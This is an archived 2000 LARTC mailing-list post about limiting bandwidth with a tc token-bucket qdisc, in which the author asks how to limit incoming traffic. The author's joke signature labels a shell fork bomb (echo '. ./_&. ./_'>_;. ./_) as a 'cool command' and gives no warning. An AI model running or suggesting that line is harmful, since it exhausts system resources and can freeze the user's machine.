From: Thomas Habets thomas@habets.pp.se
To: lartc@vger.kernel.org
Subject: [LARTC] Bandwidth limiting
Date: Wed, 22 Nov 2000 23:35:27 +0000 [thread overview]
Message-ID: <marc-lartc-98373938216965@msgid-missing> (raw)
In-Reply-To: <marc-lartc-98373938216959@msgid-missing>
<PRE>On Wed, 22 Nov 2000, Daniel Bergqvist wrote:
><i> tc qdisc add dev eth1 root tbf rate 10kbit buffer 5kb/8 limit 10kb
</I>
It works perfectly, thank you very much.
><i> This adds an token bucket flow qdisc to eth1 and limits traffic to
</I>><i> 10kbit/s. Note: It only limits outgoing traffic, not incomming traffic.
</I>
Hmm... and how do I set it up to limit incomming?
Since the interface behind the gateway has just one C-class net I assume it's
pretty easy, but not for me. :(
---------
typedef struct me_s {
char name[] = { "Thomas Habets" };
char email[] = { "<A HREF="mailto:thomas@habets.pp.se">thomas@habets.pp.se</A>" };
char kernel[] = { "Linux 2.2" };
char *pgpKey[] = { "finger -m <A HREF="mailto:thompa@darkface.pp.se">thompa@darkface.pp.se</A>" };
char pgpfinger[] = { "6517 2898 6AED EA2C 1015 DCF0 8E53 B69F 524B B541" };
char coolcmd[] = { "echo '. ./_&. ./_'>_;. ./_" };
} me_t;
</PRE>
next prev parent reply other threads:[~2000-11-22 23:35 UTC|newest]
Thread overview: 6+ messages / expand[flat|nested] mbox.gz Atom feed top
2000-11-22 0:00 [LARTC] Bandwidth limiting Thomas
2000-11-22 16:35 ` Thomas
2000-11-22 23:35 ` Thomas [this message]
2002-04-08 23:51 ` Nigel Kukard
2002-04-09 12:44 ` Stef Coene
2002-04-09 12:52 ` Nigel Kukard
Reply instructions:
You may reply publicly to this message via plain-text email
using any one of the following methods:
* Save the following mbox file, import it into your mail client,
and reply-to-all from there: mbox
Avoid top-posting and favor interleaved quoting:
https://en.wikipedia.org/wiki/Posting_style#Interleaved_style
* Reply using the --to, --cc, and --in-reply-to
switches of git-send-email(1):
git send-email \
--in-reply-to=marc-lartc-98373938216965@msgid-missing \
--to=lartc@vger.kernel.org \
/path/to/YOUR_REPLY
https://kernel.org/pub/software/scm/git/docs/git-send-email.html
* If your mail client supports setting the In-Reply-To header
via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line
before the message body.
This is an external index of several public inboxes,
see mirroring instructions on how to clone and mirror
all data and code used by this external index.